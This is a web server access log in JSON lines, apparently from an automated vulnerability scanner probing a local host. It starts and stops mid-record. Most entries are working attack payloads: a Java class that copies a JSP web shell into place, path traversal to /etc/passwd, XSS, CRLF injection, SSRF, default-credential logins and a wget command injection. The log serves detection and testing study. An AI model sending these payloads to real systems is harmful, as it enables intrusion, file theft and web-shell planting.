\x07\x00!\x07\x00\x22\x01\x00\x06\x01\x00\x03()V\x01\x00\x04Code\x01\x00\x0FLineNumberTable\x01\x00\x08\x01\x00\x0D\x0AStackMapTable\x07\x00 \x01\x00\x0D\x0ASourceFile\x01\x00\x07Si.java\x0C\x00\x0D\x0A\x00\x0E\x07\x00#\x0C\x00$\x00%\x01\x00\x10java/lang/String\x01\x00\x03cmd\x01\x00\x02/c\x01\x00\x04copy\x01\x00\x06ws.jsp\x01\x00*..\x5Cwebapps\x5Cadssp\x5Chelp\x5Cadmin-guide\x5Ctest.jsp\x0C\x00&\x00'\x01\x00\x13java/io/IOException\x01\x00\x02Si\x01\x00\x10java/lang/Object\x01\x00\x11java/lang/Runtime\x01\x00\x0D\x0AgetRuntime\x01\x00\x15()Ljava/lang/Runtime;\x01\x00\x04exec\x01\x00(([Ljava/lang/String;)Ljava/lang/Process;\x00!\x00\x0B\x00\x0C\x00\x00\x00\x00\x00\x02\x00\x01\x00\x0D\x0A\x00\x0E\x00\x01\x00\x0F\x00\x00\x00\x1D\x00\x01\x00\x01\x00\x00\x00\x05*\xB7\x00\x01\xB1\x00\x00\x00\x01\x00\x10\x00\x00\x00\x06\x00\x01\x00\x00\x00\x02\x00\x08\x00\x11\x00\x0E\x00\x01\x00\x0F\x00\x00\x00d\x00\x05\x00\x02\x00\x00\x00+\xB8\x00\x02K*\x08\xBD\x00\x03Y\x03\x12\x04SY\x04\x12\x05SY\x05\x12\x06SY\x06\x12\x07SY\x07\x12\x08S\xB6\x00\x09L\xA7\x00\x04K\xB1\x00\x01\x00\x00\x00&\x00)\x00\x0D\x0A\x00\x02\x00\x10\x00\x00\x00\x12\x00\x04\x00\x00\x00\x05\x00\x04\x00\x06\x00&\x00\x07\x00*\x00\x08\x00\x12\x00\x00\x00\x07\x00\x02i\x07\x00\x13\x00\x00\x01\x00\x14\x00\x00\x00\x02\x00\x15\x0D\x0A--43992a07d9a30213782780204a9f032b--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /./RestAPI/LogonCustomization HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.170","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /general/login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"methodToCall=openSSLTool&action=generateCSR&KEY_LENGTH=1024+-providerclass+Si+-providerpath+%22..%5Cbin%22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /./RestAPI/Connection HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"{\x22id\x22:1,\x22jsonrpc\x22:\x222.0\x22,\x22params\x22:{\x22username\x22:\x22minioadmin\x22,\x22password\x22:\x22minioadmin\x22},\x22method\x22:\x22Web.Login\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /minio/webrpc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"1.174","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.bash_history HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /help/admin-guide/test.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/options-general.php/%3C/script%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/?page=skatubazar_option HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /_plugin/head/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.012","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.ksh_history HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /accounts/login?next=/admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /shop/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fuel/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.sh_history HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"username=admin&password=admin&_submit_check=1&jlbqgb7g0x=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gespage/webapp/login.xhtml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpwiki/index.php/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"\x0D\x0A \x0D\x0A HTTP://127.0.0.1/wsman/\x0D\x0A http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\x0D\x0A \x0D\x0A http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous\x0D\x0A \x0D\x0A http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript\x0D\x0A 102400\x0D\x0A uuid:00B60932-CC01-0005-0000-000000010000\x0D\x0A PT1M30S\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A root/scx\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A aWQ=\x0D\x0A \x0D\x0A 0\x0D\x0A true\x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wsman HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /asd/../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.zsh_history HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xmldata?item=CpqKey HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pentaho/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"{\x22code\x22: {\x22$gt\x22: 0}, \x22password\x22: \x22SuperStrongPassword1\x22, \x22passwordConfirmation\x22: \x22SuperStrongPassword1\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /admin/auth/reset-password HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wan.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SecMail/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remotereporter/load_logfiles.php?server=127.0.0.1&url=https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gateway/routes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.175","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/gateway/routes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"[{\x22query\x22:\x22query {\x5Cn __typename \x5Cn }\x22}, {\x22query\x22:\x22mutation { \x5Cn __typename \x5Cn }\x22}]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/100 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.183","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sslmgr HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.184","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"action=tie_ajax_search&query[]=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..%5c..%5c..%5c..%5c..%5cetc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?url=http://0177.0.0.1/server-status HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /q?start=2000/10/21-00:00:00&end=2020/10/25-15:56:44&m=sum:sys.cpu.nice&o=&ylabel=&xrange=10:10&yrange=[33:system(%27wget%20http://example.com%27)]&wxh=1516x644&style=linespoint&baba=lala&grid=t&json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /reset/IjEi.YhAmmQ.cdQp7CnnVq02aQ05y8tSBddl-qs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:36:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET 